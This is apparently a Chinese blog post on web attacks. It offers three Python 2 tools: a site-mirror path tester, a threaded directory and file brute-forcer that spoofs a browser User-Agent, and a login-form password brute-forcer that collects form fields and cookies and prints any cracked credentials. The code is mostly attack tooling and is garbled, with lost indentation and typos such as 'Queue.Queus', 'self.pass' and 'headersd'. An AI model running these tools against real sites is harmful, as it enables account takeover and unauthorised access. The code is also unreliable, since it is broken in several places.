web攻击

urllib2

urllib2 是 Python 2 的标准库之一，用于打开和请求 URL。

示例代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import Queue
import threading
import os
import urllib2


# Number of worker threads to spawn.
threads = 10

# Remote web root to test against (e.g. "http://www.example.com")
# and the local directory holding a mirror of the site.
target = ""
directory = ""

# Extensions not worth requesting remotely.
# Bug fix: the original list used "." instead of "," between
# elements, which is a syntax error.
filters = [".jpg", ".gif", ".png", ".css"]

os.chdir(directory)

# Queue of web-relative paths shared by all worker threads.
web_paths = Queue.Queue()

# Walk the local mirror and queue every unfiltered file;
# strip the leading "." so the path is relative to the web root.
for r, d, f in os.walk("."):
    for files in f:
        remote_path = "%s/%s" % (r, files)
        if remote_path.startswith("."):
            remote_path = remote_path[1:]
        if os.path.splitext(files)[1] not in filters:
            web_paths.put(remote_path)

def test_remote():
while not web_paths.empty():
path = web_paths.get()
url = "%s%s" % (target, path)

request = urllib2.Request(url)
try:
response = urllib2.urlopen(request)
content = response.read()
print "[%d] => %s" % (response.code, path)
response.close()

except urllib2.HTTPError as error:
print "Failed %s" % error.code
pass

for i in range(threads):
print "Spawning thread: %d" % i
t = threading.Thread(target = test_remote)
t.start()

暴力破解目录和文件位置

我们可以使用简单的代码完成简单的暴力破解工具。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
import urllib2
import threading
import Queue
import urllib

# Number of brute-forcing threads.
threads = 50
# Base URL to brute-force, e.g. "http://testphp.vulnweb.com".
target_url = ""

# Wordlist file: one candidate path per line.
wordlist_file = ""

# Set to a word from the wordlist to resume an interrupted run.
resume = None

# Spoofed browser User-Agent. Bug fix: the original string was
# misspelled ("Mozila", lowercase "firefox"), which defeats the
# point of mimicking a real browser.
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"

def build_wordlist(wordlist_file):

with open(wordlist_file, "rb") as f:
raw_words = fd.readlines()

found_resume = False

words = Queue.Queus()

for word in raw_words:
word = word.rstrip()
if resume != None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "Resuming wordlist from: %s" % resume
else:
words.put(word)
return words

def dir_bruter(word_queue, extensions = None):
while not word_queue.empty():
attempt = word_queue.get()
attempt_list = []

if "." not in attempt:
attempt_list.append("/%s/" % attempt )
else:
attempt_list.append("/%s" % attempt )

if extensions:
for extension in extensions:
attempt_list.append("%s%s" % (attempt, extension) )
for brute in attempt_list:
url = "%s%s" % (target_url, urllib.quote(brute))
try:
headers = {}
headers["User-Agent"] = user_agent
r = urllib2.Request(url, headersd = headers)
response = urllib2.urlopen(r)

if len(response.read()):
print "[%d] => %s" % (response.code, url)
except urllib2.URLError, e:
if hasattr(e, 'code') and e.code != 404:
print "!!! %d => %s" % (e.code, url)
pass

# Build the shared word queue and fan out the worker threads.
word_queue = build_wordlist(wordlist_file)

extensions = [".php", ".bak", ".orig", ".inc"]

for i in range(threads):
    t = threading.Thread(target=dir_bruter, args=(word_queue, extensions))
    t.start()

暴力破解HTML表单认证

要求:

  • 检索登录页面,接受所有返回的cookie值
  • 从HTML中获取所有表单元素
  • 在你的字典中设置所需要猜测的用户名和密码
  • 发送 HTTP POST 数据包到登录处理脚本，数据包含所有的 HTML 表单字段和存储的 cookie 值
  • 测试是否能够成功登录Web应用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
import urllib2
import urllib
import cookielib
import threading
import sys
import Queue

# Bug fix: in Python 2 both the module and the class are named
# HTMLParser -- "HTMLParse" does not exist.
from HTMLParser import HTMLParser

# Number of threads brute-forcing this single username.
user_threads = 10

# Target account and the password wordlist file.
username = ""
wordlist_file = ""
# Set to a word from the wordlist to resume an interrupted run.
resume = None

# URL of the login page and URL the login form POSTs to.
target_url = ""
target_post = ""

# Names of the form's username and password <input> fields.
username_field = "username"
password_field = "passwd"

# Marker string that only appears after a successful login.
success_check = "Administration - Control Panel"

class Bruter(object):
def __init__(self, username, words):
self.username = username
self.password_q = words
self.found = False

print "Finished setting up for: %s" % username

def run_bruteforce(self):
for i in range(user_threads):
t = threading.Thread(target = self.web_bruter)
t.start()

def web_bruter(self):
brute = self.pass.get().rstrip()
jar = cookielib.FileCookieJar("cookies")
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

response = opener.open(target_url)

page = response.read()

print "Trying: %s:%s (%d left)" % (self.username, brute, self.password_q.qsize())

parser = BruterParser()

parser.feed(page)

post_tags = parser.tag_results

post_tags[username_field] = self.username
post_tags[password_field] = brute

login_data= urllib.urlencode(post_tags)

login_response = opener.open(target_post, login_data)

login_result = login_response.read()

if success_check in login_result:
self.found = True

print "[*] Bruterforce successful."
print "[*] Username: %s" % username
print "[*] Password: %s" % brute
print "[*] Waiting for other threads to exit..."


class BruterParser(HTMLParser):
    """Collects the name/value pair of every <input> tag on a page."""

    def __init__(self):
        # Bug fix: the base class is HTMLParser, not the nonexistent
        # HTMLParse.
        HTMLParser.__init__(self)
        self.tag_results = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            tag_name = None
            tag_value = None
            for name, value in attrs:
                if name == "name":
                    tag_name = value
                # Bug fix: the original was missing the colon here.
                if name == "value":
                    tag_value = value
            if tag_name is not None:
                # Bug fix: store the captured tag_value, not the loop
                # variable `value` (which holds whatever attribute
                # happened to come last).
                self.tag_results[tag_name] = tag_value


words = build_wordlist(wordlist_file)
bruter_obj = Bruter(username, words)
bruter_obj.run_bruteforce()

当使用 HTMLParser 类的时候,有三种主要的方法可以供你使用,分别是:handle_starttag,handle_endtag和handle_data。其中handle_starttag函数可以在遇到一个HTML标签开启时调用,handle_endtag函数正好相反,在每遇到一个HTML标签闭合时使用。handle_data函数用来处理两个标签之间的原始文本。

-----本文结束感谢您的阅读-----
warcup wechat
欢迎扫描二维码关注我的公众号~~~
喜 欢 这 篇 文 章 吗 ?